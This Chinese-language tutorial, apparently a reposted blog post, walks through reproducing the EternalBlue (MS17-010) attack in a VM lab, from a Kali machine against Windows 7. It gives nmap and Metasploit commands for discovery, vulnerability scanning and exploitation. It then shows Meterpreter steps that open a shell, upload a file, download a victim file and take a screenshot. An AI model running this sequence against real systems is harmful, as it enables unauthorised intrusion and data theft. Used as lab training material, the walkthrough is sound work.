赞
踩
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
以下均在虚拟机中运行
受害机:windows7 x64 192.168.150.130
攻击机:kali linux 192.168.150.129
条件:两台主机之间要能ping的通(在同一网段)
以下行为虽为复现,但前期还是做一下收集信息的工作
首先我们关闭win7的防火墙,不关闭防火墙后续操作可能存在问题(有可能nmap扫描不到其端口,MSF利用不了永恒之蓝漏洞)
win7的地址
kali的地址
主机发现有许多方法,这里我们说两种方法
(1)用kali中的nmap 扫描网段做主机发现
nmap -sP 192.168.150.130
(2)用kali中的metasploit(MSF)做主机发现
msfconsole //启动MSF
use auxiliary/scanner/discovery/arp_sweep //use使用模块
set rhosts 192.168.150.0/24 //设置扫描网段
set threads 50 //提高线程
run //运行
为了发现目的ip是否开放135、139、445端口,有两种方法
(1)使用namp -sT 端口扫描
nmap -sV 192.168.150.130
(2)使用MSF 端口扫描
use auxiliary/scanner/portscan/tcp //使用模块
set rhosts 192.168.150.130 //设置远程ip
run
扫出来端口139 135 445 是开放的,如果没有开启防火墙的状况下是可以直接利用的
3.1 MSF 搜索永恒之蓝的漏洞 输入search ms17-010
1. blue就是永恒之蓝的漏洞
2. psexec是可利用的一个javascripe(JS)的一个模块
3. command是运行cmd的
4. 最后一个是探测的模块
我们先利用探测的模块看是否存在漏洞
use 3 //使用模块 use auxiliary/scanner/smb/smb_ms17_010也可以
show options //查看要配置的参数
set rhosts 192.168.95.129 //设置远程ip
run //运行
扫出来 红框里的那句话,说明极大可能存在永恒之蓝漏洞
3.2 利用永恒之蓝模块
use exploit/windows/smb/ms17_010_eternalblue
show options //查看要配置的参数
set rhosts 192.168.150.130
exploit/run
出现meterpreter即成功,Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如进入cmd、获取屏幕、上传/下载文件、创建持久后门等
meterpreter > shell
chcp 65001 //转换一下编码 要不然会乱码
ipconfig #查看ip
whoami #查看当前用户名称
这里将kali的index.html文件上传到win7的c盘中
C:\Windows\system32>exit
exit
meterpreter > upload /home/kkk/Desktop/index.html c://
[*] Uploading : /home/kkk/Desktop/index.html -> c://\index.html
[*] Completed : /home/kkk/Desktop/index.html -> c://\index.html
可以看到上传成功
这里我们将win7 c盘里的test文件下载到kali里
meterpreter > download c://test.txt
meterpreter > screenshot #屏幕截图
后续还可以上传后门、提权、权限维持等操作,持久化控制主机,这里就不说了。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。